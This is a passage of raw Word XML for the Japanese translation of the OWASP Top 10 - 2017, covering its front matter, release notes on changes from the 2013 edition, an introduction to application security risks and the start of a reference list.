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64.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId303.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId306.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId20.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId22.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最も重大なウェブアプリケーションリスク　トップ10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">November 20, 2017</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="release"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>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この成果物はクリエイティブコモンズ Attribution-ShareAlike 4.0 International License のもとでリリースされています</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="29" w:name="リリース"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">リリース</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="重要な注意事項"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">重要な注意事項</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="コメント募集"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:hyperlink r:id="rId26">
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:t xml:space="preserve">https://github.com/OWASP/Top10/issues</w:t>
          </w:r>
        </w:hyperlink>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andrew van der Stock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Brian Glas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Neil Smithline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Torsten Gigler</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="toc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt; replace me with a toc &gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="45" w:name="o-owaspについて"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O OWASPについて</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="36" w:name="owaspについて"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションセキュリティのためのツールと標準</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションセキュリティテスト、セキュアなコード開発、セキュアなコードレビューについての一揃いの文献</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">プレゼンテーションや</w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ビデオ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">開発者に共通なさまざまなトピックを扱った</w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">チートシート</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">標準的なセキュリティコントロールとライブラリ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">世界中にあるローカルチャプター</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">先端的な調査研究</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">多方面にわたる</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">世界中のコンファレンス</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">メーリングリスト</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">さらに多くの情報はこちら:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:hyperlink r:id="rId23">
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:t xml:space="preserve">https://owasp.org</w:t>
          </w:r>
        </w:hyperlink>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における改善を必要とする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OWASPは新しいタイプの組織です。商業的な圧力に縛られないという自由は、アプリケーションセキュリティに関する、偏りのない、実用的な、かつ費用対効果の高い情報を提供することを可能にします。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bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="38" w:name="著作権とライセンス"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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The OWASP Foundation. This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="41" w:name="前書き"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">前書き</w:t>
      </w:r>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10にどれほどの情熱があるかを示しており、したがってOWASPにとって、大多数の活用事例にとってTop 10を適切なものにすることがどれほど重要なことであるかを示しています。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39">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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:hyperlink r:id="rId26">
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:t xml:space="preserve">https://github.com/OWASP/Top10/issues</w:t>
          </w:r>
        </w:hyperlink>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10プロジェクトと翻訳はこちらです:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId40">
        <w:hyperlink r:id="rId40">
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:t xml:space="preserve">https://owasp.org/www-project-top-ten/</w:t>
          </w:r>
        </w:hyperlink>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andrew van der Stock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Brian Glas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Neil Smithline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Torsten Gigler</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="44" w:name="プロジェクトのスポンサー"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">プロジェクトのスポンサー</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10 - 2017のスポンサー</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">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3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">謝辞</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">のリストに記載しました。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="53" w:name="i-導入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I 導入</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="owasp-top-10---2017へようこそ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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組織に、最も一般的かつ最も重要なWebアプリケーションセキュリティの弱点の影響について教育することです。また、これらのリスクの高い問題のある領域を守るための基本的なテクニックを提供し、さらに今後どうすべきかについてガイダンスを提供します。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="51" w:name="将来への道筋"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">将来への道筋</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">10まででやめない</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Developer's Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">や</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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48">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">に記載されています。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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Cs/>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49">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39">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Cs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">賢くツールを活用する</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>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Cs/>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0">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Software Assurance Maturity Model (SAMM)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">にあります。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="謝辞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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10をもっと手に取りやすくするため、Top 10のこのリリースを多数の言語に翻訳なさる翻訳者の皆さんに前もって感謝したいと思います。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="61" w:name="rn-リリースノート"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RN リリースノート</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="54" w:name="X78a77cf07d3ae8c419d03bc0184ef2d0d71a1b6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2013年版から2017年版への変更点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">前のバージョンから4年以上、世の中の変化は加速してきたため、OWASP Top 10 は変化する必要がありました。我々は、OWASP Top 10 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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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いまや、シングルページアプリケーション（SPA）やモバイルアプリケーションで使われているAPI や RESTful Webサービスの背後に居座っています。コードによるアーキテクチャの前提、たとえば信頼できる発信者のような前提はもはや有効ではありません。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScriptはいまやWebの主要言語であり、サーバー側で実行されるNode.jsや、クライアントで動作するBootstrap、Electron、Angular、Reactなどの今どきのWebフレームワークで用いられています。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="56" w:name="データに裏付けられた新しい問題"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">データに裏付けられた新しい問題</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A4:2017-XML 外部エンティティ参照 (XXE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">は、新しいカテゴリです。主にソースコード分析を行うセキュリティテストツール(</w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)から寄せられたデータが根拠となっています。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="コミュニティにより裏付けられた新しい問題"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A8:2017-安全でないデシリアライゼーション</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、この問題のある環境ではリモートからのコード実行や機微なオブジェクト操作が可能になります。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="60" w:name="統合引退ただし忘れて良いという意味ではない"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">統合、引退。ただし、忘れて良いという意味ではない</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A4-安全でないオブジェクト直接参照</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">と</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A7-機能レベルアクセス制御の欠落</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">は、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A5:2017-アクセス制御の不備</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">にマージされました。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A8-クロスサイトリクエストフォージェリ (CSRF)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">は、多くのフレームワークがこの対策を講じており</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">（CSRF対策）</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、アプリケーションの5%程度でのみ観察されています。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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306687"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3306687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="77" w:name="アプリケーションのセキュリティリスク"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションのセキュリティリスク</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="63" w:name="アプリケーションのセキュリティリスクについて"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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drawing>
          <wp:inline>
            <wp:extent cx="5943600" cy="2010992"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="0x10-risk-1" title="" id="1" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/0x10-risk-1.png" id="0" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2010992"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">これらの経路の中には、検出や悪用がしやすいものもあれば、しにくいも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bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="66" w:name="あなたにとってのリスク"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4431792" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="0x10-risk-2" title="" id="1" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/0x10-risk-2.png" id="0" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4431792" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">この版において、リスクの発生頻度や影響度を算出する、リスク格付の体系を更新しています。詳細は、「リスクに関する注記」を参照してください。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Risk Rating Methodology</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">では、各リスクに関する発生可能性や影響度を算出するリスク格付方法をアップデートしています。詳細は「リスクに関する注記」を参照してください。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">各組織はユニークであるため、侵害において脅威を引き起こすアクター、目標、影響度も各組織でユニークでしょう。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Top 10におけるリスクは、理解の促進及び混乱を招くことを避けるため、可能な限りCWEに沿った名称としています。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="76" w:name="参考資料"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="68" w:name="owasp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Risk Rating Methodology</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Article on Threat/Risk Modeling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="75" w:name="その他"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">その他</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId69">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ISO 31000: Risk Management Std</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
